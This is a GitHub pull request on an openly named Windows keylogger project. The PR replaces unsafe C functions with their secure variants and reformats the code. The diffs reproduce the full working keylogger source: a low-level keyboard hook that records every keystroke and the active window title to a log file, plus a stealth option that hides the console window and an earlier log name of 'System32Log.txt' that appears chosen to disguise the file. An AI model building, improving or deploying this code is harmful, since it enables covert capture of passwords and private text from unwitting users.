### PR TITLE
Replaced localtime and strcp with localtime_s and strcpy_s, also reformatted code with clang-format

### DIFF
--- a/windows/klog_main.cpp
+++ b/windows/klog_main.cpp
@@ -214,8 +214,7 @@ int main()
     // open output file in append mode
     const char* output_filename = "keylogger.log";
     std::cout << "Logging output to " << output_filename << std::endl;
-
-    output_file.open("keylogger.log", std::ios_base::app);
+    output_file.open(output_filename, std::ios_base::app);
 
     // visibility of window
     Stealth();

--- a/windows/klog_main.cpp
+++ b/windows/klog_main.cpp
@@ -1,8 +1,8 @@
 #include <Windows.h>
-#include <time.h>
-#include <iostream>
 #include <cstdio>
 #include <fstream>
+#include <iostream>
+#include <time.h>
 
 // defines whether the window is visible or not
 // should be solved with makefile, not in this file
@@ -19,162 +19,207 @@ KBDLLHOOKSTRUCT kbdStruct;
 int Save(int key_stroke);
 std::ofstream OUTPUT_FILE;
 
-// This is the callback function. Consider it the event that is raised when, in this case, 
+// This is the callback function. Consider it the event that is raised when, in this case,
 // a key is pressed.
 LRESULT __stdcall HookCallback(int nCode, WPARAM wParam, LPARAM lParam)
 {
-	if (nCode >= 0)
-	{
-		// the action is valid: HC_ACTION.
-		if (wParam == WM_KEYDOWN)
-		{
-			// lParam is the pointer to the struct containing the data needed, so cast and assign it to kdbStruct.
-			kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);
-			
-			// save to file
-			Save(kbdStruct.vkCode);
-		}
-	}
+    if (nCode >= 0)
+    {
+        // the action is valid: HC_ACTION.
+        if (wParam == WM_KEYDOWN)
+        {
+            // lParam is the pointer to the struct containing the data needed, so cast and assign it to kdbStruct.
+            kbdStruct = *((KBDLLHOOKSTRUCT*) lParam);
 
-	// call the next hook in the hook chain. This is nessecary or your hook chain will break and the hook stops
-	return CallNextHookEx(_hook, nCode, wParam, lParam);
+            // save to file
+            Save(kbdStruct.vkCode);
+        }
+    }
+
+    // call the next hook in the hook chain. This is nessecary or your hook chain will break and the hook stops
+    return CallNextHookEx(_hook, nCode, wParam, lParam);
 }
 
 void SetHook()
 {
-	// Set the hook and set it to use the callback function above
-	// WH_KEYBOARD_LL means it will set a low level keyboard hook. More information about it at MSDN.
-	// The last 2 parameters are NULL, 0 because the callback function is in the same thread and window as the
-	// function that sets and releases the hook.
-	if (!(_hook = SetWindowsHookEx(WH_KEYBOARD_LL, HookCallback, NULL, 0)))
-	{
-		LPCWSTR a = L"Failed to install hook!";
-		LPCWSTR b = L"Error";
-		MessageBox(NULL, a, b, MB_ICONERROR);
-	}
+    // Set the hook and set it to use the callback function above
+    // WH_KEYBOARD_LL means it will set a low level keyboard hook. More information about it at MSDN.
+    // The last 2 parameters are NULL, 0 because the callback function is in the same thread and window as the
+    // function that sets and releases the hook.
+    if (!(_hook = SetWindowsHookEx(WH_KEYBOARD_LL, HookCallback, NULL, 0)))
+    {
+        LPCWSTR a = L"Failed to install hook!";
+        LPCWSTR b = L"Error";
+        MessageBox(NULL, a, b, MB_ICONERROR);
+    }
 }
 
 void ReleaseHook()
 {
-	UnhookWindowsHookEx(_hook);
+    UnhookWindowsHookEx(_hook);
 }
 
 int Save(int key_stroke)
 {
-	static char lastwindow[256] = "";
-    
-	if ((key_stroke == 1) || (key_stroke == 2))
-		return 0; // ignore mouse clicks
-	
-	HWND foreground = GetForegroundWindow();
+    static char lastwindow[256] = "";
+
+    if ((key_stroke == 1) || (key_stroke == 2))
+    {
+        return 0; // ignore mouse clicks
+    }
+
+    HWND foreground = GetForegroundWindow();
     DWORD threadID;
     HKL layout = NULL;
-    if (foreground) {
-        //get keyboard layout of the thread
+
+    if (foreground)
+    {
+        // get keyboard layout of the thread
         threadID = GetWindowThreadProcessId(foreground, NULL);
         layout = GetKeyboardLayout(threadID);
     }
 
     if (foreground)
     {
-		char window_title[256];
-        GetWindowTextA(foreground,(LPSTR)window_title, 256);
-        
-        if(strcmp(window_title, lastwindow)!=0) {
-            strcpy(lastwindow, window_title);
-            
+        char window_title[256];
+        GetWindowTextA(foreground, (LPSTR) window_title, 256);
+
+        if (strcmp(window_title, lastwindow) != 0)
+        {
+            strcpy_s(lastwindow, sizeof(lastwindow), window_title);
+
             // get time
             time_t t = time(NULL);
-            struct tm *tm = localtime(&t);
+            struct tm tm;
+            localtime_s(&tm, &t);
             char s[64];
-            strftime(s, sizeof(s), "%c", tm);
-            
-            OUTPUT_FILE << "\n\n[Window: "<< window_title << " - at " << s << "] ";
+            strftime(s, sizeof(s), "%c", &tm);
+
+            OUTPUT_FILE << "\n\n[Window: " << window_title << " - at " << s << "] ";
         }
     }
 
+    std::cout << key_stroke << '\n';
 
-	std::cout << key_stroke << '\n';
-
-	if (key_stroke == VK_BACK)
+    if (key_stroke == VK_BACK)
+    {
         OUTPUT_FILE << "[BACKSPACE]";
-	else if (key_stroke == VK_RETURN)
-		OUTPUT_FILE <<  "\n";
-	else if (key_stroke == VK_SPACE)
-		OUTPUT_FILE << " ";
-	else if (key_stroke == VK_TAB)
-		OUTPUT_FILE << "[TAB]";
-	else if (key_stroke == VK_SHIFT || key_stroke == VK_LSHIFT || key_stroke == VK_RSHIFT)
-		OUTPUT_FILE << "[SHIFT]";
-	else if (key_stroke == VK_CONTROL || key_stroke == VK_LCONTROL || key_stroke == VK_RCONTROL)
-		OUTPUT_FILE << "[CONTROL]";
-	else if (key_stroke == VK_ESCAPE)
-		OUTPUT_FILE << "[ESCAPE]";
-	else if (key_stroke == VK_END)
-		OUTPUT_FILE << "[END]";
-	else if (key_stroke == VK_HOME)
-		OUTPUT_FILE << "[HOME]";
-	else if (key_stroke == VK_LEFT)
-		OUTPUT_FILE << "[LEFT]";
-	else if (key_stroke == VK_UP)
-		OUTPUT_FILE << "[UP]";
-	else if (key_stroke == VK_RIGHT)
-		OUTPUT_FILE << "[RIGHT]";
-	else if (key_stroke == VK_DOWN)
-		OUTPUT_FILE << "[DOWN]";
-	else if (key_stroke == 190 || key_stroke == 110)
-		OUTPUT_FILE << ".";
-	else if (key_stroke == 189 || key_stroke == 109)
-		OUTPUT_FILE << "-";
-	else if (key_stroke == 20)
-		OUTPUT_FILE << "[CAPSLOCK]";
-	else {
+    }
+    else if (key_stroke == VK_RETURN)
+    {
+        OUTPUT_FILE << "\n";
+    }
+    else if (key_stroke == VK_SPACE)
+    {
+        OUTPUT_FILE << " ";
+    }
+    else if (key_stroke == VK_TAB)
+    {
+        OUTPUT_FILE << "[TAB]";
+    }
+    else if (key_stroke == VK_SHIFT || key_stroke == VK_LSHIFT || key_stroke == VK_RSHIFT)
+    {
+        OUTPUT_FILE << "[SHIFT]";
+    }
+    else if (key_stroke == VK_CONTROL || key_stroke == VK_LCONTROL || key_stroke == VK_RCONTROL)
+    {
+        OUTPUT_FILE << "[CONTROL]";
+    }
+    else if (key_stroke == VK_ESCAPE)
+    {
+        OUTPUT_FILE << "[ESCAPE]";
+    }
+    else if (key_stroke == VK_END)
+    {
+        OUTPUT_FILE << "[END]";
+    }
+    else if (key_stroke == VK_HOME)
+    {
+        OUTPUT_FILE << "[HOME]";
+    }
+    else if (key_stroke == VK_LEFT)
+    {
+        OUTPUT_FILE << "[LEFT]";
+    }
+    else if (key_stroke == VK_UP)
+    {
+        OUTPUT_FILE << "[UP]";
+    }
+    else if (key_stroke == VK_RIGHT)
+    {
+        OUTPUT_FILE << "[RIGHT]";
+    }
+    else if (key_stroke == VK_DOWN)
+    {
+        OUTPUT_FILE << "[DOWN]";
+    }
+    else if (key_stroke == 190 || key_stroke == 110)
+    {
+        OUTPUT_FILE << ".";
+    }
+    else if (key_stroke == 189 || key_stroke == 109)
+    {
+        OUTPUT_FILE << "-";
+    }
+    else if (key_stroke == 20)
+    {
+        OUTPUT_FILE << "[CAPSLOCK]";
+    }
+    else
+    {
         char key;
         // check caps lock
         bool lowercase = ((GetKeyState(VK_CAPITAL) & 0x0001) != 0);
 
         // check shift key
-        if ((GetKeyState(VK_SHIFT) & 0x1000) != 0 || (GetKeyState(VK_LSHIFT) & 0x1000) != 0 || (GetKeyState(VK_RSHIFT) & 0x1000) != 0) {
-            lowercase = !lowercase;   
+        if ((GetKeyState(VK_SHIFT) & 0x1000) != 0 || (GetKeyState(VK_LSHIFT) & 0x1000) != 0
+            || (GetKeyState(VK_RSHIFT) & 0x1000) != 0)
+        {
+            lowercase = !lowercase;
         }
 
-        //map virtual key according to keyboard layout 
-        key = MapVirtualKeyExA(key_stroke,MAPVK_VK_TO_CHAR, layout);
-        
-        //tolower converts it to lowercase properly
-        if (!lowercase) key = tolower(key);
-		OUTPUT_FILE <<  char(key);
+        // map virtual key according to keyboard layout
+        key = MapVirtualKeyExA(key_stroke, MAPVK_VK_TO_CHAR, layout);
+
+        // tolower converts it to lowercase properly
+        if (!lowercase)
+        {
+            key = tolower(key);
+        }
+        OUTPUT_FILE << char(key);
     }
-	
-	//instead of opening and closing file handlers every time, keep file open and flush.
+
+    // instead of opening and closing file handlers every time, keep file open and flush.
     OUTPUT_FILE.flush();
-	return 0;
+
+    return 0;
 }
 
 void Stealth()
 {
-	#ifdef visible
-		ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 1); // visible window
-	#endif // visible
+#ifdef visible
+    ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 1); // visible window
+#endif
 
-	#ifdef invisible
-		ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0); // invisible window
-	#endif // invisible
+#ifdef invisible
+    ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0); // invisible window
+#endif
 }
 
 int main()
 {
-	//open output file in append mode
-    OUTPUT_FILE.open("System32Log.txt",std::ios_base::app);	
-	// visibility of window
-	Stealth();
+    // open output file in append mode
+    OUTPUT_FILE.open("System32Log.txt", std::ios_base::app);
 
-	// Set the hook
-	SetHook();
+    // visibility of window
+    Stealth();
 
-	// loop to keep the console application running.
-	MSG msg;
-	while (GetMessage(&msg, NULL, 0, 0))
-	{
-	}
+    // set the hook
+    SetHook();
+
+    // loop to keep the console application running.
+    MSG msg;
+    while (GetMessage(&msg, NULL, 0, 0))
+    {
+    }
 }

--- a/windows/klog_main.cpp
+++ b/windows/klog_main.cpp
@@ -2,6 +2,7 @@
 #include <cstdio>
 #include <fstream>
 #include <iostream>
+#include <sstream>
 #include <time.h>
 
 // defines whether the window is visible or not
@@ -17,7 +18,7 @@ HHOOK _hook;
 KBDLLHOOKSTRUCT kbdStruct;
 
 int Save(int key_stroke);
-std::ofstream OUTPUT_FILE;
+std::ofstream output_file;
 
 // This is the callback function. Consider it the event that is raised when, in this case,
 // a key is pressed.
@@ -61,6 +62,7 @@ void ReleaseHook()
 
 int Save(int key_stroke)
 {
+    std::stringstream output;
     static char lastwindow[256] = "";
 
     if ((key_stroke == 1) || (key_stroke == 2))
@@ -95,75 +97,73 @@ int Save(int key_stroke)
             char s[64];
             strftime(s, sizeof(s), "%c", &tm);
 
-            OUTPUT_FILE << "\n\n[Window: " << window_title << " - at " << s << "] ";
+            output << "\n\n[Window: " << window_title << " - at " << s << "] ";
         }
     }
 
-    std::cout << key_stroke << '\n';
-
     if (key_stroke == VK_BACK)
     {
-        OUTPUT_FILE << "[BACKSPACE]";
+        output << "[BACKSPACE]";
     }
     else if (key_stroke == VK_RETURN)
     {
-        OUTPUT_FILE << "\n";
+        output << "\n";
     }
     else if (key_stroke == VK_SPACE)
     {
-        OUTPUT_FILE << " ";
+        output << " ";
     }
     else if (key_stroke == VK_TAB)
     {
-        OUTPUT_FILE << "[TAB]";
+        output << "[TAB]";
     }
     else if (key_stroke == VK_SHIFT || key_stroke == VK_LSHIFT || key_stroke == VK_RSHIFT)
     {
-        OUTPUT_FILE << "[SHIFT]";
+        output << "[SHIFT]";
     }
     else if (key_stroke == VK_CONTROL || key_stroke == VK_LCONTROL || key_stroke == VK_RCONTROL)
     {
-        OUTPUT_FILE << "[CONTROL]";
+        output << "[CONTROL]";
     }
     else if (key_stroke == VK_ESCAPE)
     {
-        OUTPUT_FILE << "[ESCAPE]";
+        output << "[ESCAPE]";
     }
     else if (key_stroke == VK_END)
     {
-        OUTPUT_FILE << "[END]";
+        output << "[END]";
     }
     else if (key_stroke == VK_HOME)
     {
-        OUTPUT_FILE << "[HOME]";
+        output << "[HOME]";
     }
     else if (key_stroke == VK_LEFT)
     {
-        OUTPUT_FILE << "[LEFT]";
+        output << "[LEFT]";
     }
     else if (key_stroke == VK_UP)
     {
-        OUTPUT_FILE << "[UP]";
+        output << "[UP]";
     }
     else if (key_stroke == VK_RIGHT)
     {
-        OUTPUT_FILE << "[RIGHT]";
+        output << "[RIGHT]";
     }
     else if (key_stroke == VK_DOWN)
     {
-        OUTPUT_FILE << "[DOWN]";
+        output << "[DOWN]";
     }
     else if (key_stroke == 190 || key_stroke == 110)
     {
-        OUTPUT_FILE << ".";
+        output << ".";
     }
     else if (key_stroke == 189 || key_stroke == 109)
     {
-        OUTPUT_FILE << "-";
+        output << "-";
     }
     else if (key_stroke == 20)
     {
-        OUTPUT_FILE << "[CAPSLOCK]";
+        output << "[CAPSLOCK]";
     }
     else
     {
@@ -186,11 +186,14 @@ int Save(int key_stroke)
         {
             key = tolower(key);
         }
-        OUTPUT_FILE << char(key);
+        output << char(key);
     }
 
     // instead of opening and closing file handlers every time, keep file open and flush.
-    OUTPUT_FILE.flush();
+    output_file << output.str();
+    output_file.flush();
+
+    std::cout << output.str();
 
     return 0;
 }
@@ -209,7 +212,10 @@ void Stealth()
 int main()
 {
     // open output file in append mode
-    OUTPUT_FILE.open("System32Log.txt", std::ios_base::app);
+    const char* output_filename = "keylogger.log";
+    std::cout << "Logging output to " << output_filename << std::endl;
+
+    output_file.open("keylogger.log", std::ios_base::app);
 
     // visibility of window
     Stealth();


### PR DESCRIPTION
Works in Visual Studio 2019. Solves the following problems:

```
Severity	Code	Description	Project	File	Line	Suppression State
Error	C4996	'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.	keylogger	C:\Users\Martijn\git\Keylogger\windows\klog_main.cpp	84	
Error	C4996	'localtime': This function or variable may be unsafe. Consider using localtime_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.	keylogger	C:\Users\Martijn\git\Keylogger\windows\klog_main.cpp	88	
```

No more need to mess with _CRT_SECURE_NO_WARNINGS  in Visual Studio no more.